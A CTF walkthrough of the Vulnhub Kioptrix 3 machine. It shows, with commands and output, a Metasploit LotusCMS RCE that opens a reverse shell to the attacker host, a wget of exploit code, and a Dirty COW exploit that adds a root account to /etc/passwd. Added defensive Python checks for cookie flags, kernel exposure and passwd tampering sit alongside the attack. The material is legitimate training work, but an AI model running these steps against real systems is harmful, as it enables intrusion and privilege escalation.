Vulnhub: Detailed Walkthrough of the Kioptrix Level 3 Target Machine
Kioptrix Level 3
Author: jason_huawen
Basic information about the target machine
Name: Kioptrix: Level 1.2 (#3)
Address:
https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
Identifying the target host's IP address
┌──(root💀kali)-[~/vulnhub/Kio_3]
└─# netdiscover -i eth1 -r 10.1.0.0/16
Currently scanning: 10.1.87.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.1.1.1 00:50:56:c0:00:01 1 60 VMware, Inc.
10.1.1.140 00:0c:29:b8:01:0e 1 60 VMware, Inc.
10.1.1.254 00:50:56:f6:e5:92 1 60 VMware, Inc.
Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 10.1.1.140.
NMAP scan
┌──(root💀kali)-[~/vulnhub/Kio_3]
└─# nmap -sS -sV -sC -p- 10.1.1.140 -oN nmap_full_scan
Starting Nmap 7.91 ( https://nmap.org ) at 2022-12-04 23:45 EST
Nmap scan report for bogon (10.1.1.140)
Host is up (0.0042s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:B8:01:0E (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.66 seconds
The NMAP scan results show that the target host has 2 open ports: 22 (SSH) and 80 (HTTP). Note also the http-cookie-flags finding: the PHPSESSID session cookie is issued without the HttpOnly flag.
Obtaining a shell
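The nmap http-cookie-flags script reported that PHPSESSID is set without HttpOnly. The following is an added example (not part of the original walkthrough) showing the same check from the defender's side: it parses the Set-Cookie headers a server returns and reports which security attributes each cookie lacks. The SAMPLE_HEADERS values are constructed; the first mirrors the weak cookie nmap flagged on this target, the second is the hardened form for contrast.

```python
"""Audit Set-Cookie headers for missing security attributes (added example)."""
import urllib.request
from typing import Dict, List, Tuple

# Attributes a session cookie should carry (compared case-insensitively).
REQUIRED_FLAGS = ("httponly", "secure", "samesite")

# Constructed sample headers: the first mirrors the weak cookie nmap reported
# on Kioptrix 3 (no HttpOnly), the second is the hardened form for contrast.
SAMPLE_HEADERS = [
    "PHPSESSID=0123456789abcdef0123456789abcdef; path=/",
    "PHPSESSID=0123456789abcdef0123456789abcdef; path=/; HttpOnly; Secure; SameSite=Lax",
]


def parse_set_cookie(header: str) -> Tuple[str, Dict[str, str]]:
    """Split one Set-Cookie value into (cookie name, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        if part:
            key, _, value = part.partition("=")
            attrs[key.strip().lower()] = value.strip()
    return name, attrs


def missing_flags(header: str) -> List[str]:
    """Return the required attributes this Set-Cookie header lacks."""
    _, attrs = parse_set_cookie(header)
    return [flag for flag in REQUIRED_FLAGS if flag not in attrs]


def audit_cookies(headers: List[str]) -> List[Dict[str, object]]:
    """One finding per cookie that is missing at least one required attribute."""
    findings: List[Dict[str, object]] = []
    for header in headers:
        name, _ = parse_set_cookie(header)
        missing = missing_flags(header)
        if missing:
            findings.append({"cookie": name, "missing": missing})
    return findings


def fetch_set_cookie_headers(url: str) -> List[str]:
    """Collect every Set-Cookie header from a live response (needs network access)."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.headers.get_all("Set-Cookie") or []


if __name__ == "__main__":
    # Offline run against the constructed sample; pass a URL to check your own server.
    import sys
    headers = fetch_set_cookie_headers(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_HEADERS
    for finding in audit_cookies(headers):
        print(f"{finding['cookie']}: missing {', '.join(finding['missing'])}")
```

For a PHP application the fix is configuration rather than code: session.cookie_httponly = 1 (and session.cookie_secure = 1 once the site is served over HTTPS) in php.ini. Since this target serves plain HTTP, the Secure flag will always show as missing until TLS is in place, so treat that finding according to the deployment.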
┌──(root💀kali)-[~/vulnhub/Kio_3]
└─# curl http://10.1.1.140/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch Server at 10.1.1.140 Port 80</address>
</body></html>
Visiting port 80, the returned page contains a Login link; following it returns a login page, which also reveals that the CMS is LotusCMS. An SQL injection attempt against the login form did not succeed, so instead look up known LotusCMS vulnerabilities:
┌──(root💀kali)-[~/vulnhub/Kio_3]
└─# searchsploit lotuscms
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit) | php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities | php/webapps/16982.txt
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
This CMS has a remote command execution vulnerability, but the CMS version on the target host is not yet known, so try the module first:
msf6 > use exploit/multi/http/lcms_php_exec
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/lcms_php_exec) > show options
Module options (exploit/multi/http/lcms_php_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /lcms/ yes URI
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.84.194 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic LotusCMS 3.0
msf6 exploit(multi/http/lcms_php_exec) > set RHOSTS 10.1.1.140
RHOSTS => 10.1.1.140
msf6 exploit(multi/http/lcms_php_exec) > set URI /
Execution failed, but after looking at other people's solutions, which used exactly this method, I tried again and found that switching to a different payload made it succeed!
msf6 > use exploit/multi/http/lcms_php_exec
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/lcms_php_exec) > show options
Module options (exploit/multi/http/lcms_php_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /lcms/ yes URI
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.84.194 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic LotusCMS 3.0
msf6 exploit(multi/http/lcms_php_exec) > set LHOST 10.1.1.128
LHOST => 10.1.1.128
msf6 exploit(multi/http/lcms_php_exec) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/http/lcms_php_exec) > set URI /
URI => /
msf6 exploit(multi/http/lcms_php_exec) > set RHOSTS 10.1.1.140
RHOSTS => 10.1.1.140
msf6 exploit(multi/http/lcms_php_exec) > exploit
[*] Started reverse TCP handler on 10.1.1.128:5555
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/lcms_php_exec) > show options
Module options (exploit/multi/http/lcms_php_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.1.1.140 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI / yes URI
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.1.1.128 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic LotusCMS 3.0
msf6 exploit(multi/http/lcms_php_exec) > set payload
set payload generic/custom set payload php/bind_php set payload php/meterpreter/bind_tcp_uuid
set payload generic/shell_bind_tcp set payload php/bind_php_ipv6 set payload php/meterpreter/reverse_tcp
set payload generic/shell_reverse_tcp set payload php/download_exec set payload php/meterpreter/reverse_tcp_uuid
set payload multi/meterpreter/reverse_http set payload php/exec set payload php/reverse_perl
set payload multi/meterpreter/reverse_https set payload php/meterpreter/bind_tcp set payload php/reverse_php
set payload php/bind_perl set payload php/meterpreter/bind_tcp_ipv6
set payload php/bind_perl_ipv6 set payload php/meterpreter/bind_tcp_ipv6_uuid
msf6 exploit(multi/http/lcms_php_exec) > set payload php/reverse_php
payload => php/reverse_php
msf6 exploit(multi/http/lcms_php_exec) > show options
Module options (exploit/multi/http/lcms_php_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.1.1.140 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI / yes URI
VHOST no HTTP server virtual host
Payload options (php/reverse_php):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.1.1.128 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic LotusCMS 3.0
msf6 exploit(multi/http/lcms_php_exec) > exploit
[*] Started reverse TCP handler on 10.1.1.128:5555
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (10.1.1.128:5555 -> 10.1.1.140:53808) at 2022-12-05 00:24:03 -0500
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
The shell obtained through Metasploit is not very stable, so spawn a new one:
┌──(root💀kali)-[~]
└─# nc -nlvp 6666
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 10.1.1.140.
Ncat: Connection from 10.1.1.140:55996.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Kioptrix3:/home/www/kioptrix3.com$
Privilege escalation
Upload the linpeas.sh script to the target host's /tmp directory, make it executable, and run it; the script output indicates that dirtycow can be used to escalate privileges:
cd /tmp
www-data@Kioptrix3:/tmp$ wget http://10.1.1.128:8000/40616.c
wget http://10.1.1.128:8000/40616.c
--08:32:47-- http://10.1.1.128:8000/40616.c
=> `40616.c'
Connecting to 10.1.1.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,963 (4.8K) [text/x-csrc]
100%[====================================>] 4,963 --.--K/s
08:32:47 (1023.37 MB/s) - `40616.c' saved [4963/4963]
www-data@Kioptrix3:/tmp$ gcc -o exploit 40616.c -pthread
gcc -o exploit 40616.c -pthread
40616.c: In function 'procselfmemThread':
40616.c:99: warning: passing argument 2 of 'lseek' makes integer from pointer without a cast
40616.c: In function 'main':
40616.c:142: error: invalid use of undefined type 'struct stat'
40616.c:144: error: invalid use of undefined type 'struct stat'
40616.c:145: error: invalid use of undefined type 'struct stat'
40616.c:148: error: invalid use of undefined type 'struct stat'
40616.c:159:2: warning: no newline at end of file
Compilation failed on the target's old toolchain, so other usable exploit code is needed.
www-data@Kioptrix3:/home/www/kioptrix3.com/data/users$ uname -a
uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
www-data@Kioptrix3:/home/www/kioptrix3.com/data/users$
┌──(root💀kali)-[~/vulnhub/Kio_3]
└─# searchsploit kernel 2.6.24
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Android Kernel < 4.8 - ptrace seccomp Filter Bypass | android/dos/46434.c
Apple iOS < 10.3.1 - Kernel | ios/local/42555.txt
Apple Mac OSX < 10.6.7 - Kernel Panic (Denial of Service) | osx/dos/17901.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c
40839.c is usable:
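The searchsploit entry above gives the affected range for Dirty COW as starting at kernel 2.6.22, and the target's uname output shows 2.6.24-24-server from 2009. The following is an added example (not part of the original post) of the version-based triage a defender would run across a fleet: it parses uname strings and reports whether the kernel version falls inside the affected range. The fixed releases it uses (mainline 4.8.3 and stable 4.7.9 and 4.4.26, October 2016) are my assumptions from the upstream fix, not taken from the page; other longterm branches also received backports that are not listed, so the check deliberately errs toward reporting exposure. SAMPLE_UNAME_A is the page's own uname line.

```python
"""Heuristic kernel-version triage for Dirty COW exposure (added example)."""
import re
from typing import Dict, Tuple

Version = Tuple[int, int, int]

FIRST_AFFECTED: Version = (2, 6, 22)
# Branch -> first release on that branch carrying the fix (assumed from upstream).
FIXED_ON_BRANCH: Dict[Tuple[int, int], Version] = {
    (4, 8): (4, 8, 3),
    (4, 7): (4, 7, 9),
    (4, 4): (4, 4, 26),
}
# Every mainline release from 4.9 onward was cut after the fix.
FIRST_CLEAN_MAINLINE: Version = (4, 9, 0)

# The `uname -a` line the walkthrough captured on the target.
SAMPLE_UNAME_A = (
    "Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux"
)


def parse_kernel_release(release: str) -> Version:
    """Pull the numeric x.y[.z] out of a `uname -r` string such as '2.6.24-24-server'."""
    match = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not match:
        raise ValueError(f"not a kernel release string: {release!r}")
    return int(match.group(1)), int(match.group(2)), int(match.group(3) or 0)


def release_from_uname_a(line: str) -> str:
    """The third whitespace-separated field of `uname -a` is the kernel release."""
    return line.split()[2]


def dirty_cow_version_exposed(release: str) -> bool:
    """True if the version number alone places the kernel in the affected range."""
    version = parse_kernel_release(release)
    if version < FIRST_AFFECTED or version >= FIRST_CLEAN_MAINLINE:
        return False
    fixed = FIXED_ON_BRANCH.get(version[:2])
    if fixed is not None:
        return version < fixed
    # Branches without a listed fix (including EOL ones such as 4.5 and 4.6):
    # report as exposed and let the distro package changelog decide.
    return True


def triage(uname_a: str) -> str:
    """Human-readable verdict for one host's `uname -a` output."""
    release = release_from_uname_a(uname_a)
    state = "EXPOSED (version-based)" if dirty_cow_version_exposed(release) else "not in affected range"
    return f"{release}: {state}"


if __name__ == "__main__":
    print(triage(SAMPLE_UNAME_A))
```

Version strings are only a first pass: Ubuntu and RHEL backport security fixes without bumping the upstream version, so a distro 4.4.0 or 3.x kernel may already be patched and must be confirmed from the package changelog (apt-get changelog for the running linux-image package, or rpm -q --changelog kernel). That caveat does not rescue this target, whose 2009 kernel build predates the 2016 fix by years.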
┌──(root💀kali)-[~/vulnhub/Kio_3]
└─# searchsploit -m linux/local/40839.c
Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
URL: https://www.exploit-db.com/exploits/40839
Path: /usr/share/exploitdb/exploits/linux/local/40839.c
File Type: C source, ASCII text, with CRLF line terminators
Copied to: /root/vulnhub/Kio_3/40839.c
www-data@Kioptrix3:/tmp$ gcc -pthread -o exploit 40839.c -lcrypt
gcc -pthread -o exploit 40839.c -lcrypt
40839.c:193:2: warning: no newline at end of file
www-data@Kioptrix3:/tmp$ ls
ls
40616.c 40839.c exploit linpeas.sh
www-data@Kioptrix3:/tmp$ chmod +x exploit
chmod +x exploit
www-data@Kioptrix3:/tmp$ ./exploit
./exploit
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 123
Complete line:
firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bash
mmap: b7fe0000
id
id
su firefart
su firefart
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
www-data@Kioptrix3:/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Kioptrix3:/tmp$ su firefart
Password: 123
firefart@Kioptrix3:/tmp# cd /tmp
cd /tmp
firefart@Kioptrix3:/tmp# cd /root
cd /root
firefart@Kioptrix3:~# ls -alh
ls -alh
total 52K
drwx------ 5 firefart root 4.0K 2011-04-17 08:59 .
drwxr-xr-x 21 firefart root 4.0K 2011-04-11 16:54 ..
-rw------- 1 firefart root 9 2011-04-18 11:49 .bash_history
-rw-r--r-- 1 firefart root 2.2K 2007-10-20 07:51 .bashrc
-rw-r--r-- 1 firefart root 1.3K 2011-04-16 08:13 Congrats.txt
drwxr-xr-x 12 firefart root 12K 2011-04-16 07:26 ht-2.0.18
-rw------- 1 firefart root 963 2011-04-12 19:33 .mysql_history
-rw------- 1 firefart root 228 2011-04-18 11:09 .nano_history
-rw-r--r-- 1 firefart root 141 2007-10-20 07:51 .profile
drwx------ 2 firefart root 4.0K 2011-04-13 10:06 .ssh
drwxr-xr-x 3 firefart root 4.0K 2011-04-15 23:30 .subversion
firefart@Kioptrix3:~# cat Congrats.txt
cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.
Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.
The object is to learn, do some research and have a little (legal)
fun in the process.
I hope you enjoyed this third challenge.
Steven McElrea
aka loneferret
http://www.kioptrix.com
Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.
Main page CMS:
http://www.lotuscms.org
Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/
The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/
Also, all pictures were taken from Google Images, so being part of the
public domain I used them.
firefart@Kioptrix3:~#
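The exploit run above reports inserting the line firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bash into /etc/passwd after backing the original up to /tmp/passwd.bak. The following is an added example (not part of the original post and not the exploit author's code) of the checks a responder would run on a host to find exactly that kind of tampering: an extra uid-0 account, a password hash placed directly in /etc/passwd instead of /etc/shadow, lines that no longer have seven fields, and a diff against a known-good copy. SAMPLE_PASSWD and SAMPLE_BASELINE are constructed; the firefart line is the one the page shows.

```python
"""Audit /etc/passwd for the traces a passwd-overwrite exploit leaves (added example)."""
from typing import Dict, List

# Constructed sample: a small /etc/passwd after the exploit added its account.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bash
"""

# Constructed known-good baseline (a snapshot, or /etc/passwd- kept by the shadow tools).
SAMPLE_BASELINE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
"""

# Password-field values that mean "look in /etc/shadow" or "account locked".
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!", ""}


def audit_passwd(text: str) -> List[Dict[str, str]]:
    """One finding per suspicious line: extra uid-0 accounts, hashes stored in
    /etc/passwd, and entries that no longer have the seven colon-separated fields."""
    findings: List[Dict[str, str]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append({"line": str(lineno), "issue": "malformed entry", "entry": line})
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and name != "root":
            findings.append({"line": str(lineno), "issue": "extra uid-0 account", "entry": name})
        if pw not in SHADOWED_OR_LOCKED and not pw.startswith("!"):
            findings.append({"line": str(lineno), "issue": "password hash stored in /etc/passwd", "entry": name})
    return findings


def diff_against_baseline(current: str, baseline: str) -> Dict[str, List[str]]:
    """Lines added to or removed from the live file relative to a known-good copy."""
    cur = [l for l in current.splitlines() if l.strip()]
    base = [l for l in baseline.splitlines() if l.strip()]
    return {
        "added": [l for l in cur if l not in base],
        "removed": [l for l in base if l not in cur],
    }


def audit_file(path: str = "/etc/passwd", baseline_path: str = "") -> Dict[str, object]:
    """Run both checks on files from disk; baseline_path is optional."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        current = fh.read()
    report: Dict[str, object] = {"findings": audit_passwd(current)}
    if baseline_path:
        with open(baseline_path, encoding="utf-8", errors="replace") as fh:
            report["diff"] = diff_against_baseline(current, fh.read())
    return report


if __name__ == "__main__":
    # Offline run on the constructed sample; use audit_file() on a real host.
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(f"line {finding['line']}: {finding['issue']} ({finding['entry']})")
    print(diff_against_baseline(SAMPLE_PASSWD, SAMPLE_BASELINE))
```

A hash sitting in the password field is worth flagging on its own, not just as an exploit trace: /etc/passwd is world-readable, so any hash there can be read and cracked by every local user. Auditing the file is reactive, though; the durable fix for this target is the kernel update.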
Lessons learned
- Although 40839.c and 40616.c both exploit the dirtycow vulnerability, the former runs successfully on this target while the latter fails to compile.
- When obtaining the shell, choosing the Metasploit module was in fact the right call, but because a different payload was used, the first run failed and no shell was obtained.
STRIVE FOR PROGRESS, NOT FOR PERFECTION